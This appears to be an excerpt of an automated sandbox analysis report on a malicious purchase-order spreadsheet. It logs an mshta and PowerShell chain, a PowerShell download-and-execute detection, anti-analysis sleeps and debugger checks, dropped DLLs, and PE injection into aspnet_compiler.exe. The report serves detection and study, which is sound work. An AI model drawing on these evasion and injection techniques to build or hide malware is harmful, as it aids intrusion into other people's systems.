              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: PO#BBGR2411PO69.xlsStream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
              Source: PO#BBGR2411PO69.xlsStream path 'Workbook' entropy: 7.99849766453 (max. 8.0)
              Source: 09230000.0.drStream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
              Source: 09230000.0.drStream path 'Workbook' entropy: 7.99844135628 (max. 8.0)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AC0101 rdtsc 27_2_00AC0101
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1536Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8392Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1166Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7777Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1270
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1565
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1421
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6156
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exe TID: 3704Thread sleep time: -360000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep count: 1536 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep count: 8392 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -3600000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\mshta.exe TID: 748Thread sleep time: -360000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep count: 1270 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep count: 1565 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148Thread sleep time: -180000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132Thread sleep count: 1421 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132Thread sleep count: 6156 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -16602069666338586s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -3000000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3768Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3716Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AC0101 rdtsc 27_2_00AC0101
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,27_2_00A707AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A60080 mov ecx, dword ptr fs:[00000030h]27_2_00A60080
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A600EA mov eax, dword ptr fs:[00000030h]27_2_00A600EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A826F8 mov eax, dword ptr fs:[00000030h]27_2_00A826F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
              Writes to foreign memory regions
